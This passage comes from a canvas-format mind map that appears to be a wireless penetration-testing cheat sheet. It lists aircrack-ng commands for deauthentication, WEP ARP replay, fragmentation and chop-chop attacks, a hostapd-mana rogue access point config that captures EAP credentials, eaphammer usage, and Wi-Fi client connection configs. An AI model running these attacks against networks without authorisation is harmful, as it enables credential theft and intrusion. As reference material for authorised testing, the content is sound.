		{"id":"da36bfcb43373a04","type":"text","text":"```bash\nwireshark <FILENAME-CAPTURE>\n```","x":-513,"y":-790,"width":419,"height":60},
		{"type":"text","text":"```wireshark\ntls.handshake.type == 11\n```","id":"fd564231ceae7310","x":-463,"y":-382,"width":364,"height":60},
		{"id":"f162b965d949e052","type":"text","text":"```bash\nbash pcapFilter.sh -f <FILENAME-CAPTURED-FILE.cap> -C\n```\nhttps://gist.githubusercontent.com/r4ulcl/f3470f097d1cd21dbc5a238883e79fb2/raw/a22ac3095e197dc97745d36ece49bb455fc6d1ae/pcapFilter.sh","x":-72,"y":-680,"width":626,"height":180},
		{"id":"b799201e55dd29ff","type":"text","text":"`--freq`  is based on channel of the AP","x":860,"y":2480,"width":457,"height":60},
		{"id":"3454fa6c990772d6","type":"text","text":"```WIRESHARK-FILTER\n(((wlan.fc.type_subtype == 0x0008) && (wlan.rsn.capabilities)) && (wlan.rsn.capabilities.mfpc == 0 &&wlan.rsn.capabilities.mfpr == 0))\n```","x":680,"y":3073,"width":770,"height":107},
		{"type":"text","text":"```wireshark\ntls.handshake.certificate\n```","id":"fbcce88c87233578","x":-463,"y":-462,"width":364,"height":60},
		{"id":"3d428e9063fde8db","type":"text","text":"- Wireshark\n- pcapFilter\n- tshark\n","x":410,"y":-1040,"width":250,"height":130},
		{"id":"4b476c234aa3d85f","type":"text","text":"```bash\ntshark -r <FILENAME-CAPTURED-FILE.cap> -Y 'eap.identity'\n```","x":1206,"y":-985,"width":738,"height":80},
		{"type":"text","text":"```mana-conf\n# SSID of the AP\nssid=NetworkName\n\n# Network interface to use and driver type\n# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'\ninterface=wlan0\ndriver=nl80211\n\n# Channel and mode\n# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)\n\nchannel=1 #update this\n\n# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax\nhw_mode=g\n\n# Setting up hostapd as an EAP server\nieee8021x=1\neap_server=1\n\n# Key workaround for Win XP\neapol_key_index_workaround=0\n\n# EAP user file we created earlier\neap_user_file=/etc/hostapd-mana/mana.eap_user\n\n# Certificate paths created earlier\nca_cert=/etc/freeradius/3.0/certs/ca.pem\nserver_cert=/etc/freeradius/3.0/certs/server.pem\nprivate_key=/etc/freeradius/3.0/certs/server.key\n# The password is actually 'whatever'\nprivate_key_passwd=whatever\ndh_file=/etc/freeradius/3.0/certs/dh\n\n# Open authentication\nauth_algs=1\n# WPA/WPA2\nwpa=3\n# WPA Enterprise\nwpa_key_mgmt=WPA-EAP\n# Allow CCMP and TKIP\n# Note: iOS warns when network has TKIP (or WEP)\nwpa_pairwise=CCMP TKIP\n\n# Enable Mana WPE\nmana_wpe=1\n\n# Store credentials in that file\nmana_credout=/tmp/hostapd.credout\n\n# Send EAP success, so the client thinks it's connected\nmana_eapsuccess=1\n\n# EAP TLS MitM\nmana_eaptls=1\n```","id":"9a35e39075832c63","x":1838,"y":226,"width":643,"height":232},
		{"id":"d22a291939c57342","type":"text","text":"```bash\npython3 ./eaphammer --cert-wizard\n```","x":664,"y":596,"width":438,"height":60},
		{"id":"a0a6f7b42c18017b","type":"text","text":"```bash\npython3 ./eaphammer -i <INTERFACE> --auth wpa-eap --essid <SSID> --creds --negotiate balanced\n```","x":1243,"y":596,"width":1037,"height":60},
		{"type":"text","text":"```bash\nmv mana.conf /etc/hostapd-mana/mana.conf\n```","id":"d49780b623b2c78f","x":1589,"y":-102,"width":500,"height":60},
		{"type":"text","text":"```bash \nrm dh && make\n```","id":"9a001e6e2ba7406e","x":1838,"y":-422,"width":250,"height":60},
		{"type":"text","text":"```bash\n cd /etc/freeradius/3.0/certs/\n```","id":"ac9350bd6fee7a10","x":1370,"y":-422,"width":387,"height":60},
		{"type":"text","text":"```server-cnf\n[server]  \n    countryName             = US  \n    stateOrProvinceName     = {2 letter state}  \n    localityName            = {City}  \n    organizationName        = {Company Name}  \n    emailAddress            = {Email}  \n    commonName              = \"Such and Such Certificate Authority\"\n```","id":"5fe31161be0be68c","x":324,"y":-62,"width":720,"height":220},
		{"type":"text","text":"```ca-cnf\n[certificate_authority]  \n    countryName             = US  \n    stateOrProvinceName     = {2 letter state}  \n    localityName            = {City}  \n    organizationName        = {Company Name}  \n    emailAddress            = {Email}  \n    commonName              = \"Such and Such Certificate Authority\"\n```","id":"f44dfebf4488c0ee","x":324,"y":-412,"width":720,"height":220},
		{"id":"535edc6b20bee998","type":"text","text":"```bash\npacketforge-ng -0 -a <BSSID> -h <YOUR_MAC> -k 255.255.255.255 -l 255.255.255.255 -y <CHOP_CHOP_PACKET>.xor -w <ARP_PACKET_NAME>\n```","x":2900,"y":-3167,"width":637,"height":116},
		{"id":"c50e8f91be4757e1","type":"text","text":"```bash\npacketforge-ng -0 -a <BSSID> -h <YOUR_MAC> -k 255.255.255.255 -l 255.255.255.255 -y <FRAGMENT_PACKET>.xor -w <ARP_PACKET_NAME>\n```","x":2900,"y":-3434,"width":637,"height":121},
		{"id":"b7560323a51207e4","type":"text","text":"```bash\naireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":1429,"y":-3139,"width":711,"height":60},
		{"id":"50b7dc9afe531d85","type":"text","text":"```bash\naireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":1429,"y":-3404,"width":711,"height":60},
		{"id":"b967c37659b4b8ed","type":"text","text":"```bash\naireplay-ng -2 -r replay_src-<FILE_NAME>.cap <INTERFACE>\n```","x":3295,"y":-3764,"width":855,"height":80},
		{"id":"129107812142ccea","type":"text","text":"```bash\nmacchanger --show <INTERFACE>\n```","x":893,"y":-3139,"width":410,"height":60},
		{"id":"fac68ca98d49d6c3","type":"text","text":"```bash\nmacchanger --show <INTERFACE>\n```","x":1467,"y":-3884,"width":410,"height":60},
		{"id":"dc9f0c60c4a2b6c1","type":"text","text":"```bash\nmacchanger --show <INTERFACE>\n```","x":887,"y":-3404,"width":410,"height":60},
		{"type":"text","text":"```bash\nsudo airodump-ng -c <AP_CHANNEL> --bssid <AP_MAC> -w <CAPTURE-FILENAME> <INTERFACE>\n```","id":"abe11dc3393d09fb","x":458,"y":-3884,"width":869,"height":60},
		{"id":"53a31d8ee845ae34","type":"text","text":"```bash\naireplay-ng -2 -r <ARP_PACKET_NAME> <INTERFACE>\n```","x":3660,"y":-3139,"width":527,"height":60},
		{"id":"8c79470a695fa1eb","type":"text","text":"```bash\naireplay-ng -2 -r <ARP_PACKET_NAME> <INTERFACE>\n```","x":3660,"y":-3404,"width":527,"height":60},
		{"id":"e0f14766e8b0f769","type":"text","text":"```bash\naireplay-ng -4 -b <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":2234,"y":-3139,"width":580,"height":60},
		{"id":"a1280c077193d34c","type":"text","text":"```bash\naireplay-ng -2 -b <BSSID> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <INTERFACE>\n```","x":3295,"y":-4024,"width":855,"height":100},
		{"id":"34d9cffcb8335edc","type":"text","text":"```bash\naireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>\n```","x":3537,"y":-4245,"width":625,"height":60},
		{"id":"35eedf648a1ed443","type":"text","text":"```bash\naireplay-ng -5 -b <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":2234,"y":-3404,"width":580,"height":60},
		{"id":"6bc87e00b0d14c6e","type":"text","text":"```bash\naireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":2103,"y":-3884,"width":711,"height":60},
		{"id":"7d480355d9fb75c7","type":"text","text":"```bash\naireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":2600,"y":-4245,"width":599,"height":60},
		{"id":"417a65f3e5b70c7e","type":"text","text":"```bash\naireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>\n```","x":1743,"y":-4245,"width":711,"height":60},
		{"id":"e1adaf6b622e4090","type":"text","text":"```bash\nmacchanger --show <INTERFACE>\n```","x":1144,"y":-4245,"width":410,"height":60},
		{"id":"cfa9b3794f337385","type":"text","text":"Attack AP","x":-283,"y":-4265,"width":280,"height":100,"color":"4"},
		{"id":"beb628ac40d5d5c7","type":"text","text":"WEP Shared Key Authentication","x":-723,"y":-2689,"width":250,"height":111,"color":"#1b34b1"},
		{"id":"2fe45cd96837f519","type":"text","text":"No clients are connected to the AP","x":-753,"y":-3323,"width":280,"height":100,"color":"1"},
		{"id":"1865825c700458e9","type":"text","text":"Clients are connected to the AP","x":-753,"y":-4104,"width":280,"height":100,"color":"4"},
		{"id":"f91aea1b719c1c6f","type":"text","text":"```bash\nairodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>\n```","x":3,"y":-3139,"width":780,"height":60},
		{"id":"627e0dc50a9fe8a1","type":"text","text":"```bash\nairodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>\n```","x":-3,"y":-3404,"width":786,"height":60},
		{"id":"05d161795fe6a772","type":"text","text":"Chop Chop Attack","x":-330,"y":-3139,"width":250,"height":60,"color":"1"},
		{"id":"c385ef957fb46d3a","type":"text","text":"Attack CLIENT","x":-283,"y":-3904,"width":280,"height":100,"color":"4"},
		{"type":"text","text":"```bash\nsudo airodump-ng -c <AP_CHANNEL> --bssid <AP_MAC> -w <CAPTURE-FILENAME> <INTERFACE>\n```","id":"9eab65d091ae4eec","x":165,"y":-4245,"width":869,"height":60},
		{"id":"fabf044ff7ed4f69","type":"text","text":"```bash\nbesside-ng -c <AP_CHANNEL> -b <MAC-AP> <INTERFACE> -v\n```","x":-383,"y":-4680,"width":761,"height":60},
		{"id":"9d84b7aac7121d14","type":"text","text":"Fragmentation  Attack","x":-330,"y":-3404,"width":250,"height":60,"color":"1"},
		{"id":"918dba17296bef88","type":"text","text":"```bash\ndhclient <INTERFACE> -v\n```","x":9876,"y":-6009,"width":319,"height":60},
		{"type":"text","text":"```bash \nwpa_supplicant -c <config file>\n```","id":"bcc201a3e08fac3c","x":9062,"y":-4791,"width":460,"height":60},
		{"id":"654cdd433d6a37e6","type":"text","text":"```bash\nwpa_supplicant -i <INTERFACE> -c ./wpa_supplicant.conf\n```","x":9062,"y":-4907,"width":648,"height":60},
		{"id":"8a9d516ef1d407ef","type":"text","text":"```bash \nsudo wpa_supplicant -i <INTERFACE> -c wifi-client.conf\n```","x":9530,"y":-5492,"width":602,"height":74},
		{"id":"dbf65fb93f7d06c3","type":"text","text":"```bash\ndhclient <INTERFACE> -v\n```","x":9706,"y":-5731,"width":489,"height":60},
		{"id":"0a176c75cf26e89b","type":"text","text":"```WPA3-SAE_conf\nnetwork={\n\tssid=\"NETWORK-NAME\"\n\tkey_mgmt=SAE\n\tsae_password=\"PASSWORD-4-AP\"\n\tieee80211w=2\n}\n```\n","x":8522,"y":-4120,"width":438,"height":200},
		{"id":"0d6438d69d2f6f64","type":"text","text":"```bash\ndhclient <INTERFACE> -v\n```","x":9780,"y":-4907,"width":489,"height":60},
		{"id":"c01d01335f1c4428","type":"text","text":"Generate WiFi (WPA PSK) config file","x":8357,"y":-5492,"width":306,"height":74,"color":"#d4ff00"},
		{"id":"c70065549603aa6f","type":"text","text":"```bash\nwpa_supplicant -D nl80211 -i <INTERFACE> -c psk.conf\n```","x":9012,"y":-5271,"width":698,"height":60},
		{"id":"48ea4262cd7e235e","type":"text","text":"```bash\ndhclient <INTERFACE> -v\n```","x":9780,"y":-5271,"width":489,"height":60},
		{"type":"text","text":"```bash\nwpa_supplicant -D nl80211 -i <INTERFACE> -c open.conf\n```","id":"2ccbfd6cb8a90486","x":9000,"y":-6009,"width":631,"height":60},
		{"id":"9b823d72103e2f9b","type":"text","text":"```bash\nwpa_supplicant -i <INTERFACE> -c WPA3-SAE.conf\n```","x":9083,"y":-4050,"width":560,"height":60},
		{"id":"3d786318a74cabba","type":"text","text":"```bash\ndhclient <INTERFACE> -v\n```","x":9714,"y":-4050,"width":489,"height":60},
		{"id":"fb770c9eaec768ac","type":"text","text":"```psk.conf\nnetwork={\n    ssid=\"<SSID-WIFI>\"\n    psk=\"<PASSWORD>\"\n    scan_ssid=1\n    key_mgmt=WPA-PSK\n    proto=WPA2\n}\n```","x":8522,"y":-5360,"width":410,"height":238},
		{"id":"06a77885e9336052","type":"text","text":"```bash\nwpa_supplicant -D nl80211 -i <INTERFACE> -c WEP.conf\n```","x":9000,"y":-5731,"width":631,"height":60},
		{"id":"028f4df0ae03f67f","type":"text","text":"```bash\nsudo wpa_supplicant -i <INTERFACE> -c wpa_supplicant.conf\n```","x":9012,"y":-5831,"width":619,"height":60},
		{"id":"203cf681e3a75bc1","type":"text","text":"```bash\nwpa_passphrase <SSID> <PASSPHRASE> > wifi-client.conf\n```","x":8727,"y":-5492,"width":705,"height":74},
		{"type":"text","text":"Is the NIC working in managed mode & is the ### network manager running as usual?","id":"8b59cf942567044c","x":6440,"y":-5410,"width":320,"height":160,"color":"#d4ff00"},
		{"type":"text","text":"Connect to a WiFi network","id":"294a46fbb6ab06e6","x":7360,"y":-5360,"width":320,"height":60,"color":"#d4ff00"},
		{"type":"text","text":"OPEN network","id":"dd641c09fda35928","x":8095,"y":-6009,"width":250,"height":60,"color":"#d4ff00"},
		{"type":"text","text":"```\nwpa_supplicant-conf\nnetwork={  \n  ssid=\"NetworkName\"  \n  scan_ssid=1  \n  key_mgmt=WPA-EAP  \n  identity=\"Domain\\username\"  \n  password=\"password\"  \n  eap=PEAP  \n  phase1=\"peaplabel=0\"  \n  phase2=\"auth=MSCHAPV2\"  \n}\n```","id":"c20d9a746a9a8934","x":8522,"y":-4651,"width":410,"height":406},
		{"type":"text","text":"```open-conf\nnetwork={\n        ssid=\"wifi-guest\"\n        key_mgmt=NONE\n}\n```","id":"a0e5edf5a083c136","x":8510,"y":-6051,"width":410,"height":144},
		{"id":"c2aed276192832bb","type":"text","text":"```WEP-conf\nnetwork={\n\tssid=\"<ESSID>\"\n\tscan_ssid=1\n\tkey_mgmt=NONE\n\twep_key0=1A2B3C4D5E\n}\n```\nor\n```WEP-conf\nnetwork={\nssid=\"enter name of network\"\nkey_mgmt=NONE\nwep_key0=\"enter password/key\"\nwep_tx_keyidx=0\n}\n```","x":8510,"y":-5851,"width":410,"height":300},
		{"type":"text","text":"WPA2 Enterprise Network","id":"a8c89e4ea4bf0833","x":8095,"y":-4711,"width":250,"height":80,"color":"#d4ff00"},
		{"id":"5f3624b9ebd119c6","type":"text","text":"```wpa_supplicant.conf\nnetwork={\n  ssid=\"YOUR_SSID\"\n  scan_ssid=1\n  key_mgmt=WPA-EAP\n  identity=\"YOUR_USERNAME\"\n  password=\"YOUR_PASSWORD\"\n  eap=PEAP\n  phase1=\"peaplabel=0\"\n  phase2=\"auth=MSCHAPV2\"\n}\n```","x":8522,"y":-5044,"width":410,"height":333},
		{"type":"text","text":"WPA2 network","id":"f6d4d606d02ba065","x":8107,"y":-5271,"width":250,"height":60,"color":"#d4ff00"},
		{"type":"text","text":"WPA3 SAE","id":"f604b4dcd3d237cd","x":8160,"y":-4045,"width":250,"height":50,"color":"#d4ff00"},
		{"type":"text","text":"Find WiFi Networks","id":"0b4676b175282dcd","x":-4960,"y":-4830,"width":250,"height":60,"color":"#ff00bb"}
	],
	"edges":[
		{"id":"385441b79abf9cb8","fromNode":"b719c87c69d77e63","fromSide":"right","toNode":"ef354b711c29d182","toSide":"left"},
		{"id":"e527259fe047d082","fromNode":"b719c87c69d77e63","fromSide":"right","toNode":"92e2e1c866188688","toSide":"left"},
		{"id":"a1cef3b29d5b3e9d","fromNode":"9dc71efbeb1f808f","fromSide":"right","toNode":"fd56b7283ca8134b","toSide":"left"},
		{"id":"293ef3caf99448a1","fromNode":"fd56b7283ca8134b","fromSide":"right","toNode":"41f9457baa0fdf8e","toSide":"left"},
		{"id":"25f33824837b01a0","fromNode":"a5c2e947783005e7","fromSide":"right","toNode":"9dc71efbeb1f808f","toSide":"left"},
		{"id":"636198221b9a634f","fromNode":"0b4676b175282dcd","fromSide":"right","toNode":"e0a373c510efe328","toSide":"left"},
		{"id":"28dc3c402613d713","fromNode":"6a5963af14a7fbac","fromSide":"bottom","toNode":"ab49ad6483b1b869","toSide":"top","label":"It is a hidden network name"},
		{"id":"f492dd73361d957e","fromNode":"ab49ad6483b1b869","fromSide":"bottom","toNode":"75db123891ff7b7c","toSide":"right"},
		{"id":"a97a18c8e155d6b8","fromNode":"eb4d0968e9811a98","fromSide":"bottom","toNode":"1a3b335e2e78aafb","toSide":"top","color":"#ff00bb"},
		{"id":"b5b1d040a88a828d","fromNode":"e0a373c510efe328","fromSide":"right","toNode":"6aaf8820e36a0032","toSide":"left"},
		{"id":"1bf2ec0a6c8b6cb2","fromNode":"246fbcdb052ebacb","fromSide":"right","toNode":"c45f107b8a8b6bb4","toSide":"left"},
		{"id":"32c634ab81598a15","fromNode":"9e5b7ab5bcb28017","fromSide":"right","toNode":"7509f9ac0e1cbfd7","toSide":"left","color":"1","label":"WEP"},
		{"id":"87602bca7c0e6ca3","fromNode":"4bfa087c08e11e3e","fromSide":"right","toNode":"623df9e896e86029","toSide":"left","color":"3"},
		{"id":"32b966789f3038c5","fromNode":"6efad66b26e9d7ef","fromSide":"right","toNode":"6d910cb171d614f6","toSide":"left","color":"2","label":"WPA2"},
		{"id":"ad574763c88ee84b","fromNode":"d7eac2f12e7eba02","fromSide":"right","toNode":"3786186436e72dba","toSide":"left","color":"5","label":"MGT"},
		{"id":"436056d93bb739d6","fromNode":"d0bb947e7f7aa070","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"left","color":"#d4ff00","label":"Connect to OPEN network"},
		{"id":"fd6d3a210c611880","fromNode":"dd641c09fda35928","fromSide":"right","toNode":"a0e5edf5a083c136","toSide":"left"},
		{"id":"3a4a7bc06ed12307","fromNode":"a0e5edf5a083c136","fromSide":"right","toNode":"2ccbfd6cb8a90486","toSide":"left"},
		{"id":"67bf759a1bd7e64a","fromNode":"57aa773773fac667","fromSide":"right","toNode":"c606fc2881940d3a","toSide":"left"},
		{"id":"8f745bff9a357d16","fromNode":"ee95518dec150559","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"left","color":"#d4ff00","label":"Connect to network"},
		{"id":"fb5859813a3c62c8","fromNode":"a5c2e947783005e7","fromSide":"right","toNode":"246fbcdb052ebacb","toSide":"left"},
		{"id":"112ba2fecee6d976","fromNode":"26228ae0d4326e4b","fromSide":"bottom","toNode":"29160f54a9ed0287","toSide":"top"},
		{"id":"2c1b5fdc13162012","fromNode":"29160f54a9ed0287","fromSide":"bottom","toNode":"57bd4fc7e685c2c5","toSide":"top"},
		{"id":"3bf0fe1648b5324f","fromNode":"57bd4fc7e685c2c5","fromSide":"bottom","toNode":"1f299914a851063d","toSide":"top"},
		{"id":"a3973671018e856a","fromNode":"1f299914a851063d","fromSide":"bottom","toNode":"6962e3bf35c6f6db","toSide":"top"},
		{"id":"1f665d0c53894458","fromNode":"6962e3bf35c6f6db","fromSide":"bottom","toNode":"23e31c870e89f575","toSide":"top"},
		{"id":"557ce5ff699eb392","fromNode":"23e31c870e89f575","fromSide":"bottom","toNode":"dd4a154eae237193","toSide":"top"},
		{"id":"495a1bc108dcb7a4","fromNode":"dd4a154eae237193","fromSide":"bottom","toNode":"a33c95c698b82a9c","toSide":"top"},
		{"id":"9fbab88e3a900ab9","fromNode":"ef354b711c29d182","fromSide":"right","toNode":"108037c8ef838a2b","toSide":"left"},
		{"id":"f846ea4c11463a67","fromNode":"246fbcdb052ebacb","fromSide":"right","toNode":"40ad9469694b1138","toSide":"left"},
		{"id":"01e04f03204a6a48","fromNode":"243b93a6772163db","fromSide":"right","toNode":"ac9350bd6fee7a10","toSide":"left"},
		{"id":"16b957a940f2fc63","fromNode":"4be7523075fc13a8","fromSide":"right","toNode":"ac9350bd6fee7a10","toSide":"left"},
		{"id":"815aef75bf918e01","fromNode":"ac9350bd6fee7a10","fromSide":"right","toNode":"9a001e6e2ba7406e","toSide":"left"},
		{"id":"6da6b35f8a5546f6","fromNode":"afd86401aa172d79","fromSide":"top","toNode":"d49780b623b2c78f","toSide":"bottom"},
		{"id":"3fab60ed5caaa32e","fromNode":"a5d695994851b96c","fromSide":"bottom","toNode":"179cc2370c83ee40","toSide":"top"},
		{"id":"b487e09c3a29f7a2","fromNode":"d49780b623b2c78f","fromSide":"right","toNode":"179cc2370c83ee40","toSide":"left"},
		{"id":"c857364e06a98995","fromNode":"179cc2370c83ee40","fromSide":"right","toNode":"792983bc390add52","toSide":"left"},
		{"id":"c93f3e8ca56b23d0","fromNode":"06df5d7d1790399a","fromSide":"bottom","toNode":"df725c8617ee141b","toSide":"top"},
		{"id":"459dcf1810b5f16f","fromNode":"df725c8617ee141b","fromSide":"bottom","toNode":"0e817f9ca017f45d","toSide":"left"},
		{"id":"da8a8a434d501bcf","fromNode":"92232e2408b1abcc","fromSide":"right","toNode":"29950f4be503c120","toSide":"left"},
		{"id":"b258e4ccd8a24d47","fromNode":"294a46fbb6ab06e6","fromSide":"right","toNode":"dd641c09fda35928","toSide":"left"},
		{"id":"6d3869702a0d9fc9","fromNode":"f6d4d606d02ba065","fromSide":"right","toNode":"fb770c9eaec768ac","toSide":"left"},
		{"id":"32a91267d9f7f1a6","fromNode":"294a46fbb6ab06e6","fromSide":"right","toNode":"38cc2cd1a255da5e","toSide":"left"},
		{"id":"5fa497fed56232b2","fromNode":"294a46fbb6ab06e6","fromSide":"right","toNode":"f6d4d606d02ba065","toSide":"left"},
		{"id":"2541a78ebd625dff","fromNode":"294a46fbb6ab06e6","fromSide":"right","toNode":"a8c89e4ea4bf0833","toSide":"left"},
		{"id":"b863a6fdb5a720ca","fromNode":"fb770c9eaec768ac","fromSide":"right","toNode":"c70065549603aa6f","toSide":"left"},
		{"id":"d087868d81bba6e6","fromNode":"2ccbfd6cb8a90486","fromSide":"right","toNode":"918dba17296bef88","toSide":"left"},
		{"id":"cc7068de3e3baed7","fromNode":"c70065549603aa6f","fromSide":"right","toNode":"48ea4262cd7e235e","toSide":"left"},
		{"id":"379bdc76765a949d","fromNode":"dd5b934ff38b90bd","fromSide":"right","toNode":"d619fa8f8f3de7b0","toSide":"left"},
		{"id":"6f3afc6385b22462","fromNode":"bf4a15b40e802ce9","fromSide":"right","toNode":"bec4ce138f88cc09","toSide":"left"},
		{"id":"ac006e5763608c95","fromNode":"c01d01335f1c4428","fromSide":"right","toNode":"203cf681e3a75bc1","toSide":"left"},
		{"id":"6ff80af1a06dced2","fromNode":"f6d4d606d02ba065","fromSide":"top","toNode":"c01d01335f1c4428","toSide":"left"},
		{"id":"529e2743e028f573","fromNode":"203cf681e3a75bc1","fromSide":"right","toNode":"8a9d516ef1d407ef","toSide":"left"},
		{"id":"4ab4d95e0bef7b29","fromNode":"8a9d516ef1d407ef","fromSide":"bottom","toNode":"48ea4262cd7e235e","toSide":"top"},
		{"id":"dbf7e775a052f77d","fromNode":"a8c89e4ea4bf0833","fromSide":"right","toNode":"5f3624b9ebd119c6","toSide":"left"},
		{"id":"c0c8d660d06e4ecd","fromNode":"5f3624b9ebd119c6","fromSide":"right","toNode":"654cdd433d6a37e6","toSide":"left"},
		{"id":"bf47eab93b881ffc","fromNode":"654cdd433d6a37e6","fromSide":"right","toNode":"0d6438d69d2f6f64","toSide":"left"},
		{"id":"21cbeaaf102f1003","fromNode":"c2aed276192832bb","fromSide":"right","toNode":"06a77885e9336052","toSide":"left"},
		{"id":"83ee8cb1e20cc32b","fromNode":"06a77885e9336052","fromSide":"right","toNode":"dbf65fb93f7d06c3","toSide":"left"},
		{"id":"22f1f5d5e2513893","fromNode":"38cc2cd1a255da5e","fromSide":"right","toNode":"c2aed276192832bb","toSide":"left"},
		{"id":"bf76c964a5c81233","fromNode":"d1ea0e774236e5d9","fromSide":"right","toNode":"bde03313ad7bbc9c","toSide":"left"},
		{"id":"48a9639fa487a1a9","fromNode":"6dbae79882b21845","fromSide":"right","toNode":"27f998981ee2a143","toSide":"left","color":"#ff7b00","label":"Got hash"},
		{"id":"0c8643d4f7b56d75","fromNode":"792983bc390add52","fromSide":"right","toNode":"83c19b371405b365","toSide":"left"},
		{"id":"4962b1261b42313b","fromNode":"15e496dc3b133ce6","fromSide":"right","toNode":"ae9359a879691193","toSide":"left"},
		{"id":"6335821fed957bd8","fromNode":"1335d721e71aea22","fromSide":"right","toNode":"ae9359a879691193","toSide":"left"},
		{"id":"cb78e3d0cb776500","fromNode":"677a9e768caa69e3","fromSide":"right","toNode":"ae9359a879691193","toSide":"left"},
		{"id":"991f319f4bbc8d26","fromNode":"ae9359a879691193","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"bottom","color":"#d4ff00","label":"Connect to WPA Enterprise network"},
		{"id":"33960cd373b489c5","fromNode":"4079177692ecc68f","fromSide":"right","toNode":"c6a15e22d09a7197","toSide":"left","color":"#ff7b00","label":"Got handshake"},
		{"id":"bd61d738ecb56b85","fromNode":"dd66ff335112c135","fromSide":"right","toNode":"056dde338b02633d","toSide":"top"},
		{"id":"1c3a38c62208afaf","fromNode":"1a434365cc7b28cd","fromSide":"right","toNode":"056dde338b02633d","toSide":"left"},
		{"id":"f7536caff95838f8","fromNode":"f134832b566fcf3a","fromSide":"right","toNode":"056dde338b02633d","toSide":"left"},
		{"id":"2e91dce71d9f98f2","fromNode":"bde03313ad7bbc9c","fromSide":"right","toNode":"056dde338b02633d","toSide":"left"},
		{"id":"41c49e73adfcde56","fromNode":"056dde338b02633d","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"bottom","color":"#d4ff00","label":"Connect to WPA network"},
		{"id":"d4cab7716047df78","fromNode":"f80fbd5ea5ad2ca8","fromSide":"right","toNode":"051079dca576ff13","toSide":"left"},
		{"id":"93e3e67dc45d3316","fromNode":"051079dca576ff13","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"bottom","color":"#d4ff00","label":"Connect to WEP network"},
		{"id":"b2fac9f7b2644494","fromNode":"46d46fdaf845dad6","fromSide":"right","toNode":"ee95518dec150559","toSide":"left"},
		{"id":"a077852eebaf4c02","fromNode":"d1c7b6acc95a3334","fromSide":"right","toNode":"ee95518dec150559","toSide":"left"},
		{"id":"a35e249eca0cce61","fromNode":"d619fa8f8f3de7b0","fromSide":"right","toNode":"2988e6c939c24cfe","toSide":"left"},
		{"id":"5fac4df72ddafe3b","fromNode":"bec4ce138f88cc09","fromSide":"right","toNode":"2988e6c939c24cfe","toSide":"left"},
		{"id":"3c7b7e73668100c3","fromNode":"2988e6c939c24cfe","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"left","color":"#d4ff00","label":"Connect to network"},
		{"id":"65e07f1f91400b69","fromNode":"d58f97ec02810a99","fromSide":"right","toNode":"925af61ded52258e","toSide":"left"},
		{"id":"628eb13bf59bbd9f","fromNode":"d58f97ec02810a99","fromSide":"right","toNode":"805420d3c43fc829","toSide":"left"},
		{"id":"7024503de6a3920e","fromNode":"d58f97ec02810a99","fromSide":"right","toNode":"5dd345cafa5348fd","toSide":"left"},
		{"id":"ec3c5f4e1ae8f64a","fromNode":"5dd345cafa5348fd","fromSide":"right","toNode":"bf7bad7e498a24cc","toSide":"left"},
		{"id":"cafc68031d071c59","fromNode":"805420d3c43fc829","fromSide":"right","toNode":"bf7bad7e498a24cc","toSide":"left"},
		{"id":"6a37ad16800ff52c","fromNode":"925af61ded52258e","fromSide":"right","toNode":"bf7bad7e498a24cc","toSide":"left"},
		{"id":"74df080d27801d05","fromNode":"d22a291939c57342","fromSide":"right","toNode":"a0a6f7b42c18017b","toSide":"left"},
		{"id":"eba64d6dff1ac2a0","fromNode":"a0a6f7b42c18017b","fromSide":"right","toNode":"2fe20ded3f2ebf4c","toSide":"left"},
		{"id":"c6d709bcc89b46a3","fromNode":"2fe20ded3f2ebf4c","fromSide":"right","toNode":"27f998981ee2a143","toSide":"left","color":"#ff7b00","label":"Got hash"},
		{"id":"dec357862259ad41","fromNode":"0e817f9ca017f45d","fromSide":"bottom","toNode":"d22a291939c57342","toSide":"top","label":"Input for"},
		{"id":"1b226b489d7b1faa","fromNode":"0e817f9ca017f45d","fromSide":"right","toNode":"ac9350bd6fee7a10","toSide":"bottom","label":"Input for\nManual action to create certificates"},
		{"id":"0df55e51d24a963c","fromNode":"a8c89e4ea4bf0833","fromSide":"right","toNode":"c20d9a746a9a8934","toSide":"left"},
		{"id":"de5c4b354832acfa","fromNode":"c20d9a746a9a8934","fromSide":"right","toNode":"654cdd433d6a37e6","toSide":"left"},
		{"id":"85765b98221f3ca8","fromNode":"74dcaf0b358ecd1c","fromSide":"right","toNode":"5592eb2543846363","toSide":"left"},
		{"id":"90e15b936218848e","fromNode":"5592eb2543846363","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"left","color":"#d4ff00","label":"Got credentials"},
		{"id":"c6e010b9e7e7b78f","fromNode":"4f7efd3f740180b2","fromSide":"right","toNode":"4079177692ecc68f","toSide":"left"},
		{"id":"c50d87728f0869e3","fromNode":"858519a27e6c9f05","fromSide":"right","toNode":"4f7efd3f740180b2","toSide":"left"},
		{"id":"60426540d52bc7c6","fromNode":"416446930e2b9456","fromSide":"right","toNode":"5592eb2543846363","toSide":"left"},
		{"id":"125ae197b91802a1","fromNode":"4f0e60a39024ece2","fromSide":"right","toNode":"d19aeb3b9d513cfe","toSide":"left"},
